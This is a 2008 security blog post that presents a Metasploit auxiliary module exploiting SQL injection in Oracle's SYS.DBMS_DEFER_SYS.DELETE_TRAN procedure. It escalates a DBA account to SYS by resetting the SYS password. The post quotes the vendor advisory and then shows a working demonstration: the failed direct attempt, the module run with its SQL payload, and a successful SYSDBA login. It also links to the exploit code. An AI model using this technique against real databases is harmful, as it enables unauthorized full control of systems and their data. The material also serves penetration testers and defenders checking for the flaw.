Monday, December 22, 2008

Oracle Pwnage Part 6 from DBA to SYS


In some of the past posts I covered finding a user default user account or account with an easy to guess username/password for Oracle and taking that user to DBA via SQL Injection in Oracle packages.

I've been neglecting the blog a bit porting some of the public SQLI for Oracle into metasploit auxiliary modules. Not sure when its going to be put into the trunk but it will be at some point, I think MC is working on the mixin to reduce the dependence on the Oracle instantclient.

Anyway, so it being the week of Christmas or whatever you celebrate I thought I'd put out a module that has a vulnerability out but no exploit code.

So...coverage for:
http://www.appsecinc.com/resources/alerts/oracle/2008-05.shtml

Details:
The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of SYS user.

Impact:
Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges.

Let's see it in action. Assuming we got DBA from one of the other SQLI modules.

SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
HACKER DBA NO YES NO

SQL> alter user SYS identified by 0raclefun;
alter user SYS identified by 0raclefun
*
ERROR at line 1:
ORA-01031: insufficient privileges

msf auxiliary(dbms_defer_sys) > set SQL "alter user sys identified by 0raclefun"
SQL => alter user sys identified by 0raclefun
msf auxiliary(dbms_defer_sys) > run

[*] Sending function..
[*] Done...
[*] Calling SYS.DBMS_DEFER_SYS.DELETE_TRAN...
[*] Done...
[*] Auxiliary module execution completed

cg@WPAD:~/oracle$ sqlplus sys/0raclefun@172.16.102.128/oracle as sysdba

SQL*Plus: Release 11.1.0.6.0 - Production on Fri Dec 19 17:43:57 2008

Copyright (c) 1982, 2007, Oracle. All rights reserved.


Connected to:
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Production
With the Partitioning, OLAP and Data Mining options

SQL>

select user from dual;

USER
------------------------------
SYS

SQL>

Tested on 9i and 10g release 1

codez available here: http://www.carnal0wnage.com/research/dbms_defer_sys.rb

It's definitely a work in progress, so if you have feedback, send it.
CG

1 comment:

MC said...

awesome CG!